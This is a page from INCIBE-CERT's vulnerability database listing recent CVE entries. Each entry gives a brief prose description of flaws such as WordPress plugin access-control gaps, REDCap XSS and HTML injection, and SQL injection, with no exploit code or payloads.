Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Go to Calendar     Go to Press Room     Go to Newsletters subscription

Search

Vulnerabilities

With the aim of informing, warning and helping professionals with the latest security vulnerabilities in technology systems, we have made a database available for users interested in this information, which is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 registers, is based on the information from the NVD (National Vulnerability Database) – by virtue of a partnership agreement – through which INCIBE translates the included information into Spanish.

On occasions this list will show vulnerabilities that have still not been translated, as they are added while the INCIBE team is still carrying out the translation process. The CVE  (Common Vulnerabilities and Exposures) Standard for Information Security Vulnerability Names is used with the aim to support the exchange of information between different tools and databases.

All vulnerabilities collected are linked to different information sources, as well as available patches or solutions provided by manufacturers and developers. It is possible to carry out advanced searches, as there is the option to select different criteria to narrow down the results, some examples being vulnerability types, manufacturers and impact levels, among others.

Through RSS feeds or Newsletters we can be informed daily about the latest vulnerabilities added to the repository. Below there is a list, updated daily, where you can discover the latest vulnerabilities.

CVE-2024-12204
Publication date:
11/01/2025
The Coupon X: Discount Pop Up, Promo Code Pop Ups, Announcement Pop Up, WooCommerce Popups plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in the class-cx-rest.php file in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create 100% off coupons, delete posts, delete leads, and update coupon statuses.
Severity CVSS v4.0: Pending analysis
Last modification:
11/01/2025

CVE-2024-11327
Publication date:
11/01/2025
The ClickWhale – Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.4.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
Severity CVSS v4.0: Pending analysis
Last modification:
05/06/2025

CVE-2025-23113
Publication date:
10/01/2025
An issue was discovered in REDCap 14.9.6. It has an action=myprojects&logout=1 CSRF issue in the alert-title while performing an upload of a CSV file containing a list of alert configuration. An attacker can send the victim a CSV file containing an HTML injection payload in the alert-title. Once the victim uploads the file, he automatically lands on a page to view the uploaded data. If the victim click on the alert-title value, it can trigger a logout request and terminates their session, or redirect to a phishing website. This vulnerability stems from the absence of CSRF protections on the logout functionality.
Severity CVSS v4.0: Pending analysis
Last modification:
25/02/2025

CVE-2024-9188
Publication date:
10/01/2025
Specially constructed queries cause cross platform scripting leaking administrator tokens
Severity CVSS v4.0: Pending analysis
Last modification:
29/09/2025

CVE-2025-23110
Publication date:
10/01/2025
An issue was discovered in REDCap 14.9.6. A Reflected cross-site scripting (XSS) vulnerability in the email-subject field exists while performing an upload of a CSV file containing a list of alert configurations. An attacker can send the victim a CSV file containing the XSS payload in the email-subject. Once the victim uploads the file, he automatically lands on a page to view the uploaded data. If the victim clicks on the email-subject value, it triggers the XSS payload.
Severity CVSS v4.0: Pending analysis
Last modification:
25/02/2025

CVE-2025-23111
Publication date:
10/01/2025
An issue was discovered in REDCap 14.9.6. It allows HTML Injection via the Survey field name, exposing users to a redirection to a phishing website. An attacker can exploit this to trick the user that receives the survey into clicking on the field name, which redirects them to a phishing website. Thus, this allows malicious actions to be executed without user consent.
Severity CVSS v4.0: Pending analysis
Last modification:
25/02/2025

CVE-2025-23112
Publication date:
10/01/2025
An issue was discovered in REDCap 14.9.6. A stored cross-site scripting (XSS) vulnerability allows authenticated users to inject malicious scripts into the Survey field name of Survey. When a user receive the survey, if he clicks on the field name, it triggers the XSS payload.
Severity CVSS v4.0: Pending analysis
Last modification:
25/02/2025

CVE-2024-9134
Publication date:
10/01/2025
Multiple SQL Injection vulnerabilities exist in the reporting application. A user with advanced report application access rights can exploit the SQL injection, allowing them to execute commands on the underlying operating system with elevated privileges.
Severity CVSS v4.0: Pending analysis
Last modification:
18/12/2025

CVE-2024-47518
Publication date:
10/01/2025
Specially constructed queries targeting ETM could discover active remote access sessions
Severity CVSS v4.0: Pending analysis
Last modification:
29/09/2025

CVE-2024-47519
Publication date:
10/01/2025
Backup uploads to ETM subject to man-in-the-middle interception
Severity CVSS v4.0: Pending analysis
Last modification:
29/09/2025

CVE-2024-47520
Publication date:
10/01/2025
A user with advanced report application access rights can perform actions for which they are not authorized
Severity CVSS v4.0: Pending analysis
Last modification:
29/09/2025

CVE-2024-7142
Publication date:
10/01/2025
On Arista CloudVision Appliance (CVA) affected releases running on appliances that support hardware disk encryption (DCA-350E-CV only), the disk encryption might not be successfully performed. This results in the disks remaining unsecured and data on them
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2025
Subscribe to Vulnerabilities